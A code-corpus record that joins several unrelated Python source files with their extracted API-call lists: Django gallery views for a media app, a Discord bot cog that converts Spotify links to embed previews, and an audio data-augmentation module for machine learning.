g, created = Gallery.objects.get_or_create(title=title)
g.security = security
g.description = description
g.owner = request.user
g.save()
res = Result()
res.append(g.json())
res.message = "Gallery created" if created else ""
return JsonResponse(res.asDict())
@login_required
def put(request, obj_id=None):
""" Adds Image and Video objects to Gallery based on GUIDs """
data = json.loads(request.body)["body"]
guids = data.get("guids", "").split(",")
move = data.get("from")
security = data.get("security")
gallery = Gallery.objects.get(pk=obj_id)
# Set the security first so subsequent securityChecks will get the correct security level
if security is not None:
gallery.security = json.loads(security)
gallery.save()
for child in gallery.gallery_set.all():
child.security = gallery.security
child.save()
if guids:
items = getObjectsFromGuids(guids)
gallery.addItems(items)
if move:
fromgallery = Gallery.objects.get(pk=move)
fromgallery.removeItems(items)
res = Result()
res.append(gallery.json())
return JsonResponse(res.asDict())
@login_required
def delete(request, obj_id=None):
""" Removes ImageVideo objects from Gallery """
data = json.loads(request.body)
guids = data.get("guids").split(",")
items = getObjectsFromGuids(guids)
gallery = Gallery.objects.get(pk=obj_id)
LOGGER.info(
"{} removed {} from {}".format(request.user.email, guids, gallery)
)
gallery.removeItems(items)
res = Result()
return JsonResponse(res.asDict())
@login_required
def filterObjects(request, obj_id):
"""
Filters Gallery for the requested ImageVideo objects. Returns a Result object with
serialized objects
"""
if int(obj_id) == 0:
obj = None
else:
obj = Gallery.objects.get(pk=obj_id)
isanonymous = request.user.is_anonymous
if isanonymous and obj is None:
LOGGER.warning(
"There was an anonymous access attempt from {} to {}".format(
getClientIP(request), obj
)
)
raise PermissionDenied()
if isanonymous and obj and obj.security != Gallery.PUBLIC:
LOGGER.warning(
"There was an anonymous access attempt from {} to {}".format(
getClientIP(request), obj
)
)
raise PermissionDenied()
if obj and obj.security != Gallery.PERSONAL:
if request.user.frog_prefs.first().clearance < obj.security:
raise PermissionDenied()
tags = json.loads(request.GET.get("filters", "[[]]"))
more = json.loads(request.GET.get("more", "false"))
orderby = request.GET.get(
"orderby", request.user.frog_prefs.get().json()["orderby"]
)
tags = [t for t in tags if t]
return _filter(request, obj, tags=tags, more=more, orderby=orderby)
def _filter(request, object_, tags=None, more=False, orderby="created"):
"""Filters Piece objects from self based on filters, search, and range
:param tags: List of tag IDs to filter
:type tags: list
    :param more: Returns more of the same filtered set of images based on session range
    :type more: bool
    :return: Objects filtered
    :rtype: list
"""
res = Result()
idDict = {}
objDict = {}
data = {}
modelmap = {}
# Get all IDs for each model
for m in QUERY_MODELS:
modelmap[m.model_class()] = m.model
if object_:
idDict[m.model] = m.model_class().objects.filter(gallery=object_)
else:
idDict[m.model] = m.model_class().objects.all()
if idDict[m.model] is None:
continue
if tags:
for bucket in tags:
searchQuery = ""
o = None
for item in bucket:
if item == 0:
# filter by tagless
idDict[m.model].annotate(num_tags=Count("tags"))
if not o:
o = Q()
o |= Q(num_tags__lte=1)
break
elif isinstance(item, six.integer_types):
# filter by tag
if not o:
o = Q()
o |= Q(tags__id=item)
else:
# add to search string
searchQuery += item + " "
if not HAYSTACK:
if not o:
o = Q()
# use a basic search
o |= Q(title__icontains=item)
if HAYSTACK and searchQuery != "":
# once all tags have been filtered, filter by search
searchIDs = search(searchQuery, m.model_class())
if searchIDs:
if not o:
o = Q()
o |= Q(id__in=searchIDs)
if o:
# apply the filters
idDict[m.model] = (
idDict[m.model]
.annotate(num_tags=Count("tags"))
.filter(o)
)
else:
idDict[m.model] = idDict[m.model].none()
# Remove hidden items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(hidden=True)
# Remove deleted items before slicing so we get an accurate count
idDict[m.model] = idDict[m.model].exclude(deleted=True)
# Get all ids of filtered objects, this will be a very fast query
idDict[m.model] = list(
idDict[m.model]
.order_by("-{}".format(orderby))
.values_list("id", flat=True)
)
lastid = request.session.get("last_{}".format(m.model), 0)
if not idDict[m.model]:
continue
if not more:
lastid = idDict[m.model][0]
try:
index = idDict[m.model].index(lastid)
except ValueError:
index = 0
if more and lastid != 0:
index += 1
idDict[m.model] = idDict[m.model][index : index + BATCH_LENGTH]
# perform the main query to retrieve the objects we want
objDict[m.model] = m.model_class().objects.filter(
id__in=idDict[m.model]
)
objDict[m.model] = (
objDict[m.model]
.select_related("author")
.prefetch_related("tags")
.order_by("-{}".format(orderby))
)
objDict[m.model] = list(objDict[m.model])
# combine and sort all objects by date
objects = _sortObjects(orderby, **objDict)
objects = objects[:BATCH_LENGTH]
# Find out last ids
lastids = {}
for obj in objects:
lastids["last_{}".format(modelmap[obj.__class__])] = obj.id
for key, value in lastids.items():
request.session[key] = value
# serialize objects
for i in objects:
res.append(i.json())
data["count"] = len(objects)
if settings.DEBUG:
data["queries"] = connection.queries
res.value = data
return JsonResponse(res.asDict())
def _sortObjects(orderby="created", **kwargs):
"""Sorts lists of objects and combines them into a single list"""
o = []
for m in kwargs.values():
for l in iter(m):
o.append(l)
o = list(set(o))
sortfunc = _sortByCreated if orderby == "created" else _sortByModified
if six.PY2:
o.sort(sortfunc)
else:
o.sort(key=functools.cmp_to_key(sortfunc))
return o
def _sortByCreated(a, b):
"""Sort function for object by created date"""
if a.created < b.created:
return 1
elif a.created > b.created:
return -1
else:
return 0
def _sortByModified(a, b):
"""Sort function for object by modified date"""
if a.modified < b.modified:
return 1
elif a.modified > b.modified:
return -1
else:
return 0
def search(query, model):
""" Performs a search query and returns the object ids """
query = query.strip()
LOGGER.debug(query)
sqs = SearchQuerySet()
results = sqs.raw_search("{}*".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}".format(query)).models(model)
if not results:
results = sqs.raw_search("*{}*".format(query)).models(model)
return [o.pk for o in results]
@require_POST
@login_required
def subscribe(request, obj_id):
gallery = Gallery.objects.get(pk=obj_id)
data = json.loads(request.body)["body"]
frequency = data.get("frequency", GallerySubscription.WEEKLY)
sub, created = GallerySubscription.objects.get_or_create(
gallery=gallery, user=request.user, frequency=frequency
)
if not created:
# it already existed so delete it
sub.delete()
return JsonResponse(Result().asDict())
| [
"logging.getLogger",
"haystack.query.SearchQuerySet",
"frog.models.Gallery.objects.get",
"json.loads",
"frog.models.GallerySubscription.objects.get_or_create",
"django.core.exceptions.PermissionDenied",
"django.contrib.contenttypes.models.ContentType.objects.filter",
"functools.cmp_to_key",
"django.db.models.Count",
"frog.models.Gallery.objects.filter",
"frog.common.getClientIP",
"frog.models.Gallery.objects.get_or_create",
"frog.models.Gallery.objects.all",
"django.db.models.Q",
"frog.common.Result",
"frog.common.getObjectsFromGuids"
]
| [((2656, 2681), 'logging.getLogger', 'logging.getLogger', (['"""frog"""'], {}), "('frog')\n", (2673, 2681), False, 'import logging\n'), ((4847, 4889), 'frog.models.Gallery.objects.get_or_create', 'Gallery.objects.get_or_create', ([], {'title': 'title'}), '(title=title)\n', (4876, 4889), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((4999, 5007), 'frog.common.Result', 'Result', ([], {}), '()\n', (5005, 5007), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((5410, 5440), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'obj_id'}), '(pk=obj_id)\n', (5429, 5440), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((5972, 5980), 'frog.common.Result', 'Result', ([], {}), '()\n', (5978, 5980), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((6166, 6190), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (6176, 6190), False, 'import json\n'), ((6244, 6270), 'frog.common.getObjectsFromGuids', 'getObjectsFromGuids', (['guids'], {}), '(guids)\n', (6263, 6270), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((6285, 6315), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'obj_id'}), '(pk=obj_id)\n', (6304, 6315), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((6458, 6466), 'frog.common.Result', 'Result', ([], {}), '()\n', (6464, 6466), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((8173, 8181), 'frog.common.Result', 'Result', ([], {}), '()\n', (8179, 8181), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((13195, 13211), 'haystack.query.SearchQuerySet', 'SearchQuerySet', ([], {}), '()\n', (13209, 13211), False, 'from haystack.query import SearchQuerySet\n'), ((13567, 13597), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'obj_id'}), '(pk=obj_id)\n', (13586, 13597), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((13728, 13831), 'frog.models.GallerySubscription.objects.get_or_create', 'GallerySubscription.objects.get_or_create', ([], {'gallery': 'gallery', 'user': 'request.user', 'frequency': 'frequency'}), '(gallery=gallery, user=request.\n user, frequency=frequency)\n', (13769, 13831), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((3338, 3368), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'obj_id'}), '(pk=obj_id)\n', (3357, 3368), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((3501, 3509), 'frog.common.Result', 'Result', ([], {}), '()\n', (3507, 3509), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((4039, 4086), 'frog.models.Gallery.objects.filter', 'Gallery.objects.filter', ([], {'security__lte': 'clearance'}), '(security__lte=clearance)\n', (4061, 4086), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((4609, 4633), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (4619, 4633), False, 'import json\n'), ((5254, 5278), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (5264, 5278), False, 'import json\n'), ((5592, 5612), 'json.loads', 'json.loads', 
(['security'], {}), '(security)\n', (5602, 5612), False, 'import json\n'), ((5786, 5812), 'frog.common.getObjectsFromGuids', 'getObjectsFromGuids', (['guids'], {}), '(guids)\n', (5805, 5812), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((6755, 6785), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'obj_id'}), '(pk=obj_id)\n', (6774, 6785), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((7046, 7064), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ([], {}), '()\n', (7062, 7064), False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((7307, 7325), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ([], {}), '()\n', (7323, 7325), False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((13609, 13633), 'json.loads', 'json.loads', (['request.body'], {}), '(request.body)\n', (13619, 13633), False, 'import json\n'), ((2735, 2779), 'django.contrib.contenttypes.models.ContentType.objects.filter', 'ContentType.objects.filter', ([], {'app_label': '"""frog"""'}), "(app_label='frog')\n", (2761, 2779), False, 'from django.contrib.contenttypes.models import ContentType\n'), ((3634, 3703), 'frog.models.Gallery.objects.filter', 'Gallery.objects.filter', ([], {'security': 'Gallery.PERSONAL', 'owner': 'request.user'}), '(security=Gallery.PERSONAL, owner=request.user)\n', (3656, 3703), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((5889, 5917), 'frog.models.Gallery.objects.get', 'Gallery.objects.get', ([], {'pk': 'move'}), '(pk=move)\n', (5908, 5917), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((7463, 7481), 'django.core.exceptions.PermissionDenied', 'PermissionDenied', ([], {}), '()\n', (7479, 7481), False, 'from django.core.exceptions import ImproperlyConfigured, PermissionDenied\n'), ((4568, 4589), 'frog.models.Gallery.objects.all', 'Gallery.objects.all', ([], {}), '()\n', (4587, 4589), False, 'from frog.models import Gallery, Image, Video, Group, GallerySubscription, SiteConfig, Piece\n'), ((6982, 7002), 'frog.common.getClientIP', 'getClientIP', (['request'], {}), '(request)\n', (6993, 7002), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((7243, 7263), 'frog.common.getClientIP', 'getClientIP', (['request'], {}), '(request)\n', (7254, 7263), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((12586, 12616), 'functools.cmp_to_key', 'functools.cmp_to_key', (['sortfunc'], {}), '(sortfunc)\n', (12606, 12616), False, 'import functools\n'), ((13950, 13958), 'frog.common.Result', 'Result', ([], {}), '()\n', (13956, 13958), False, 'from frog.common import Result, getObjectsFromGuids, getClientIP\n'), ((8978, 8996), 'django.db.models.Q', 'Q', ([], {'num_tags__lte': '(1)'}), '(num_tags__lte=1)\n', (8979, 8996), False, 'from django.db.models import Q, Count\n'), ((9921, 9940), 'django.db.models.Q', 'Q', ([], {'id__in': 'searchIDs'}), '(id__in=searchIDs)\n', (9922, 9940), False, 'from django.db.models import Q, Count\n'), ((8945, 8948), 'django.db.models.Q', 'Q', ([], {}), '()\n', (8946, 8948), False, 'from django.db.models import Q, Count\n'), ((9228, 9244), 'django.db.models.Q', 'Q', ([], {'tags__id': 'item'}), '(tags__id=item)\n', (9229, 9244), False, 'from django.db.models import Q, Count\n'), ((9888, 9891), 'django.db.models.Q', 
'Q', ([], {}), '()\n', (9889, 9891), False, 'from django.db.models import Q, Count\n'), ((8864, 8877), 'django.db.models.Count', 'Count', (['"""tags"""'], {}), "('tags')\n", (8869, 8877), False, 'from django.db.models import Q, Count\n'), ((9195, 9198), 'django.db.models.Q', 'Q', ([], {}), '()\n', (9196, 9198), False, 'from django.db.models import Q, Count\n'), ((9569, 9593), 'django.db.models.Q', 'Q', ([], {'title__icontains': 'item'}), '(title__icontains=item)\n', (9570, 9593), False, 'from django.db.models import Q, Count\n'), ((9483, 9486), 'django.db.models.Q', 'Q', ([], {}), '()\n', (9484, 9486), False, 'from django.db.models import Q, Count\n'), ((10127, 10140), 'django.db.models.Count', 'Count', (['"""tags"""'], {}), "('tags')\n", (10132, 10140), False, 'from django.db.models import Q, Count\n')] |
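# Sketch of URL routing that would dispatch to these views; the URL patterns and the
# frog.views.gallery module path are assumptions, not the project's actual urls.py.
from django.urls import re_path
from frog.views import gallery

urlpatterns = [
    re_path(r'^gallery/?$', gallery.index),
    re_path(r'^gallery/(?P<obj_id>\d+)/?$', gallery.index),
    re_path(r'^gallery/(?P<obj_id>\d+)/filter/?$', gallery.filterObjects),
    re_path(r'^gallery/(?P<obj_id>\d+)/subscribe/?$', gallery.subscribe),
]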
# from redbot.core import Config
from redbot.core import Config, commands, checks
import asyncio
import aiohttp
import discord
from discord import Webhook, AsyncWebhookAdapter
import re
class Spotifyembed(commands.Cog):
"""Automatically send a reply to Spotify links with a link to the embed preview. Convenient for mobile users who can finally listen to music samples from Discord, without needing an account."""
def __init__(self, bot):
self.bot = bot
self.config = Config.get_conf(self, identifier=806715409318936616)
default_guild = {
"spotifyembedEnabled": False,
}
self.config.register_guild(**default_guild)
@commands.group(aliases=["setspembed", "setspe"])
@checks.guildowner_or_permissions()
async def setspotifyembed(self, ctx: commands.Context):
"""Set Spotify Embed settings"""
if not ctx.invoked_subcommand:
# Guild settings
e = discord.Embed(color=(await ctx.embed_colour()), title="Guild Settings", description="")
e.add_field(name="spotifyembedEnabled", value=(await self.config.guild(ctx.guild).spotifyembedEnabled()), inline=False)
await ctx.send(embed=e)
@setspotifyembed.command(name="enable")
async def setspembedenable(self, ctx):
"""Enable auto-responding to Spotify links"""
await self.config.guild(ctx.guild).spotifyembedEnabled.set(True)
await ctx.message.add_reaction("✅")
@setspotifyembed.command(name="disable")
async def setspembeddisable(self, ctx):
"""Disable auto-responding to Spotify links"""
await self.config.guild(ctx.guild).spotifyembedEnabled.set(False)
await ctx.message.add_reaction("✅")
@commands.command(aliases=["spembed", "spe"])
async def spotifyembed(self, ctx, spotifyLink, asMyself: bool=False):
"""Return a Spotify embed link
Can set asMyself to true/false, for sending as webhook"""
spembedSplit = spotifyLink.split('.com/')
sendMsg = spembedSplit[0] + ".com/embed/" + spembedSplit[1]
if asMyself == False:
return await ctx.send(sendMsg)
elif asMyself == True:
# Find a webhook that the bot made
try:
whooklist = await ctx.channel.webhooks()
whurl = ""
# Return if match
for wh in whooklist:
if self.bot.user == wh.user:
whurl = wh.url
# Make new webhook if one didn't exist
if whurl == "":
newHook = await ctx.channel.create_webhook(name="Webhook")
whurl = newHook.url
async with aiohttp.ClientSession() as session:
webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session))
await webhook.send(
sendMsg,
username=ctx.author.display_name,
avatar_url=ctx.author.avatar_url,
)
except discord.errors.Forbidden:
return await ctx.send(sendMsg)
else:
return await ctx.send("An error occurred.")
@commands.Cog.listener()
async def on_message(self, message: discord.Message):
if message.author.bot:
return
if message.webhook_id:
return
if message.guild is None:
return
spotifyembedEnabled = await self.config.guild(message.guild).spotifyembedEnabled()
if spotifyembedEnabled is not True:
return
# Ignore if we find [p]spotifyembed in the trigger message
spembedCommandIgnore = r"^\S{1,9}(spotifyembed|spembed|spe)(?=\s|$)"
spembedCommands = re.findall(spembedCommandIgnore, message.clean_content)
if len(spembedCommands) > 0:
return
# Ignore if we find no spotify links in the trigger message
spembedFinder = r"https\:\/\/open\.spotify\.com\/\w{4,12}\/\w{14,26}(?=\?|$|\s)"
spembedMatches = re.findall(spembedFinder, message.clean_content)
if len(spembedMatches) <= 0:
return
sendMsg = ""
for match in spembedMatches:
spembedSplit = match.split('.com/')
sendMsg += spembedSplit[0] + ".com/embed/" + spembedSplit[1] + "\n"
# Find a webhook that the bot made
try:
whooklist = await message.channel.webhooks()
whurl = ""
# Return if match
for wh in whooklist:
if self.bot.user == wh.user:
whurl = wh.url
# Make new webhook if one didn't exist
if whurl == "":
newHook = await message.channel.create_webhook(name="Webhook")
whurl = newHook.url
async with aiohttp.ClientSession() as session:
webhook = Webhook.from_url(whurl, adapter=AsyncWebhookAdapter(session))
await webhook.send(
sendMsg,
username=message.author.display_name,
avatar_url=message.author.avatar_url,
)
except discord.errors.Forbidden:
return await message.channel.send(sendMsg)
| [
"aiohttp.ClientSession",
"redbot.core.Config.get_conf",
"redbot.core.checks.guildowner_or_permissions",
"redbot.core.commands.Cog.listener",
"redbot.core.commands.command",
"discord.AsyncWebhookAdapter",
"re.findall",
"redbot.core.commands.group"
]
| [((684, 732), 'redbot.core.commands.group', 'commands.group', ([], {'aliases': "['setspembed', 'setspe']"}), "(aliases=['setspembed', 'setspe'])\n", (698, 732), False, 'from redbot.core import Config, commands, checks\n'), ((738, 772), 'redbot.core.checks.guildowner_or_permissions', 'checks.guildowner_or_permissions', ([], {}), '()\n', (770, 772), False, 'from redbot.core import Config, commands, checks\n'), ((1742, 1786), 'redbot.core.commands.command', 'commands.command', ([], {'aliases': "['spembed', 'spe']"}), "(aliases=['spembed', 'spe'])\n", (1758, 1786), False, 'from redbot.core import Config, commands, checks\n'), ((3246, 3269), 'redbot.core.commands.Cog.listener', 'commands.Cog.listener', ([], {}), '()\n', (3267, 3269), False, 'from redbot.core import Config, commands, checks\n'), ((494, 546), 'redbot.core.Config.get_conf', 'Config.get_conf', (['self'], {'identifier': '(806715409318936616)'}), '(self, identifier=806715409318936616)\n', (509, 546), False, 'from redbot.core import Config, commands, checks\n'), ((3805, 3860), 're.findall', 're.findall', (['spembedCommandIgnore', 'message.clean_content'], {}), '(spembedCommandIgnore, message.clean_content)\n', (3815, 3860), False, 'import re\n'), ((4099, 4147), 're.findall', 're.findall', (['spembedFinder', 'message.clean_content'], {}), '(spembedFinder, message.clean_content)\n', (4109, 4147), False, 'import re\n'), ((4890, 4913), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (4911, 4913), False, 'import aiohttp\n'), ((2739, 2762), 'aiohttp.ClientSession', 'aiohttp.ClientSession', ([], {}), '()\n', (2760, 2762), False, 'import aiohttp\n'), ((4984, 5012), 'discord.AsyncWebhookAdapter', 'AsyncWebhookAdapter', (['session'], {}), '(session)\n', (5003, 5012), False, 'from discord import Webhook, AsyncWebhookAdapter\n'), ((2837, 2865), 'discord.AsyncWebhookAdapter', 'AsyncWebhookAdapter', (['session'], {}), '(session)\n', (2856, 2865), False, 'from discord import Webhook, AsyncWebhookAdapter\n')] |
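# Standalone sketch of the link rewrite the listener performs: find open.spotify.com
# links in a message and turn each into its /embed/ preview URL.
import re

message = "new song: https://open.spotify.com/track/4uLU6hMCjMI75M1A2tKUQC check it out"
finder = r"https\:\/\/open\.spotify\.com\/\w{4,12}\/\w{14,26}(?=\?|$|\s)"
for match in re.findall(finder, message):
    head, tail = match.split('.com/')
    print(head + ".com/embed/" + tail)
# -> https://open.spotify.com/embed/track/4uLU6hMCjMI75M1A2tKUQC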
import random
import math
from functools import partial
import json
import pysndfx
import librosa
import numpy as np
import torch
from ops.audio import (
read_audio, compute_stft, trim_audio, mix_audio_and_labels,
shuffle_audio, cutout
)
SAMPLE_RATE = 44100
class Augmentation:
"""A base class for data augmentation transforms"""
pass
class MapLabels:
def __init__(self, class_map, drop_raw=True):
self.class_map = class_map
def __call__(self, dataset, **inputs):
labels = np.zeros(len(self.class_map), dtype=np.float32)
for c in inputs["raw_labels"]:
labels[self.class_map[c]] = 1.0
transformed = dict(inputs)
transformed["labels"] = labels
transformed.pop("raw_labels")
return transformed
class MixUp(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
first_audio, first_labels = inputs["audio"], inputs["labels"]
random_sample = dataset.random_clean_sample()
new_audio, new_labels = mix_audio_and_labels(
first_audio, random_sample["audio"],
first_labels, random_sample["labels"]
)
transformed["audio"] = new_audio
transformed["labels"] = new_labels
return transformed
class FlipAudio(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = np.flipud(inputs["audio"])
return transformed
class AudioAugmentation(Augmentation):
def __init__(self, p):
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
effects_chain = (
pysndfx.AudioEffectsChain()
.reverb(
reverberance=random.randrange(50),
room_scale=random.randrange(50),
stereo_depth=random.randrange(50)
)
.pitch(shift=random.randrange(-300, 300))
.overdrive(gain=random.randrange(2, 10))
.speed(random.uniform(0.9, 1.1))
)
transformed["audio"] = effects_chain(inputs["audio"])
return transformed
class LoadAudio:
def __init__(self):
pass
def __call__(self, dataset, **inputs):
audio, sr = read_audio(inputs["filename"])
transformed = dict(inputs)
transformed["audio"] = audio
transformed["sr"] = sr
return transformed
class STFT:
eps = 1e-4
def __init__(self, n_fft, hop_size):
self.n_fft = n_fft
self.hop_size = hop_size
def __call__(self, dataset, **inputs):
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps)
transformed = dict(inputs)
transformed["stft"] = np.transpose(stft)
return transformed
class AudioFeatures:
eps = 1e-4
def __init__(self, descriptor, verbose=True):
name, *args = descriptor.split("_")
self.feature_type = name
if name == "stft":
n_fft, hop_size = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_features = self.n_fft // 2 + 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing STFT features with params:\n",
"n_fft: {}, hop_size: {}".format(
n_fft, hop_size
)
)
elif name == "mel":
n_fft, hop_size, n_mel = args
self.n_fft = int(n_fft)
self.hop_size = int(hop_size)
self.n_mel = int(n_mel)
self.n_features = self.n_mel
self.padding_value = 0.0
if verbose:
print(
"\nUsing mel features with params:\n",
"n_fft: {}, hop_size: {}, n_mel: {}".format(
n_fft, hop_size, n_mel
)
)
elif name == "raw":
self.n_features = 1
self.padding_value = 0.0
if verbose:
print(
"\nUsing raw waveform features."
)
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if self.feature_type == "stft":
# stft = compute_stft(
# inputs["audio"],
# window_size=self.n_fft, hop_size=self.hop_size,
# eps=self.eps, log=True
# )
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "mel":
stft = compute_stft(
inputs["audio"],
window_size=self.n_fft, hop_size=self.hop_size,
eps=self.eps, log=False
)
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
elif self.feature_type == "raw":
transformed["signal"] = np.expand_dims(inputs["audio"], -1)
return transformed
class SampleSegment(Augmentation):
def __init__(self, ratio=(0.3, 0.9), p=1.0):
self.min, self.max = ratio
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
original_size = inputs["audio"].size
target_size = int(np.random.uniform(self.min, self.max) * original_size)
start = np.random.randint(original_size - target_size - 1)
transformed["audio"] = inputs["audio"][start:start+target_size]
return transformed
class ShuffleAudio(Augmentation):
def __init__(self, chunk_length=0.5, p=0.5):
self.chunk_length = chunk_length
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = shuffle_audio(
transformed["audio"], self.chunk_length, sr=transformed["sr"])
return transformed
class CutOut(Augmentation):
def __init__(self, area=0.25, p=0.5):
self.area = area
self.p = p
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if np.random.uniform() < self.p:
transformed["audio"] = cutout(
transformed["audio"], self.area)
return transformed
class SampleLongAudio:
def __init__(self, max_length):
self.max_length = max_length
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
if (inputs["audio"].size / inputs["sr"]) > self.max_length:
max_length = self.max_length * inputs["sr"]
start = np.random.randint(0, inputs["audio"].size - max_length)
transformed["audio"] = inputs["audio"][start:start+max_length]
return transformed
class OneOf:
def __init__(self, transforms):
self.transforms = transforms
def __call__(self, dataset, **inputs):
transform = random.choice(self.transforms)
return transform(**inputs)
class DropFields:
def __init__(self, fields):
self.to_drop = fields
def __call__(self, dataset, **inputs):
transformed = dict()
for name, input in inputs.items():
if not name in self.to_drop:
transformed[name] = input
return transformed
class RenameFields:
def __init__(self, mapping):
self.mapping = mapping
def __call__(self, dataset, **inputs):
transformed = dict(inputs)
for old, new in self.mapping.items():
transformed[new] = transformed.pop(old)
return transformed
class Compose:
def __init__(self, transforms):
self.transforms = transforms
def switch_off_augmentations(self):
for t in self.transforms:
if isinstance(t, Augmentation):
t.p = 0.0
def __call__(self, dataset=None, **inputs):
for t in self.transforms:
inputs = t(dataset=dataset, **inputs)
return inputs
class Identity:
def __call__(self, dataset=None, **inputs):
return inputs | [
"random.uniform",
"random.choice",
"ops.audio.compute_stft",
"numpy.flipud",
"random.randrange",
"ops.audio.mix_audio_and_labels",
"numpy.random.randint",
"ops.audio.shuffle_audio",
"pysndfx.AudioEffectsChain",
"ops.audio.read_audio",
"numpy.random.uniform",
"numpy.expand_dims",
"numpy.transpose",
"ops.audio.cutout"
]
| [((2606, 2636), 'ops.audio.read_audio', 'read_audio', (["inputs['filename']"], {}), "(inputs['filename'])\n", (2616, 2636), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((2962, 3058), 'ops.audio.compute_stft', 'compute_stft', (["inputs['audio']"], {'window_size': 'self.n_fft', 'hop_size': 'self.hop_size', 'eps': 'self.eps'}), "(inputs['audio'], window_size=self.n_fft, hop_size=self.\n hop_size, eps=self.eps)\n", (2974, 3058), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((3157, 3175), 'numpy.transpose', 'np.transpose', (['stft'], {}), '(stft)\n', (3169, 3175), True, 'import numpy as np\n'), ((7418, 7448), 'random.choice', 'random.choice', (['self.transforms'], {}), '(self.transforms)\n', (7431, 7448), False, 'import random\n'), ((966, 985), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (983, 985), True, 'import numpy as np\n'), ((1164, 1264), 'ops.audio.mix_audio_and_labels', 'mix_audio_and_labels', (['first_audio', "random_sample['audio']", 'first_labels', "random_sample['labels']"], {}), "(first_audio, random_sample['audio'], first_labels,\n random_sample['labels'])\n", (1184, 1264), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((1601, 1620), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (1618, 1620), True, 'import numpy as np\n'), ((1666, 1692), 'numpy.flipud', 'np.flipud', (["inputs['audio']"], {}), "(inputs['audio'])\n", (1675, 1692), True, 'import numpy as np\n'), ((1902, 1921), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (1919, 1921), True, 'import numpy as np\n'), ((4940, 4975), 'numpy.expand_dims', 'np.expand_dims', (["inputs['audio']", '(-1)'], {}), "(inputs['audio'], -1)\n", (4954, 4975), True, 'import numpy as np\n'), ((5652, 5671), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (5669, 5671), True, 'import numpy as np\n'), ((5836, 5886), 'numpy.random.randint', 'np.random.randint', (['(original_size - target_size - 1)'], {}), '(original_size - target_size - 1)\n', (5853, 5886), True, 'import numpy as np\n'), ((6230, 6249), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (6247, 6249), True, 'import numpy as np\n'), ((6295, 6371), 'ops.audio.shuffle_audio', 'shuffle_audio', (["transformed['audio']", 'self.chunk_length'], {'sr': "transformed['sr']"}), "(transformed['audio'], self.chunk_length, sr=transformed['sr'])\n", (6308, 6371), False, 'from ops.audio import read_audio, compute_stft, trim_audio, mix_audio_and_labels, shuffle_audio, cutout\n'), ((6627, 6646), 'numpy.random.uniform', 'np.random.uniform', ([], {}), '()\n', (6644, 6646), True, 'import numpy as np\n'), ((6692, 6731), 